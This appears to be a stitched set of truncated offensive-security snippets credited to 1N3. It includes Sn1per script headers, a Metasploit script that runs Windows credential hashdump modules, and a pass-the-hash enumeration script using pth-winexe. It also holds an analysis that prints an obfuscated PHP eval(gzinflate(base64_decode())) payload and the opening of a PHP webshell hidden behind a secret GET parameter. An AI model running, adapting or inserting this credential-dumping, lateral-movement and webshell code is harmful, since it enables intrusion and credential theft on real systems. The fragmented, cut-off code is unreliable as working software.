1N3

#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
#

VER="4.4"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="/usr/share/sniper/plugins"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"

1N3

#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com 
#

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'

1N3

#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'

1N3

setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump

1N3

#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"

1N3

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com

1N3

/**
 * @fileoverview This file loads a bunch of HSTS domains and times how long it
 * takes for them to be redirected from HTTP to HTTPS. Based on that, it
 * decides whether the domain is a previously-noted HSTS domain or not.
 * @author yan <yan@mit.edu>
 * @license MIT
 * @version 0.2.0
 */

// Timing in milliseconds above which a network request probably occurred.

1N3

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.3 by 1N3

1N3

This was done by taking the preg_replace() function and creating a new PHP file with the function and arguments and analyzing the results...

<?php 
echo preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPU

1N3

<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;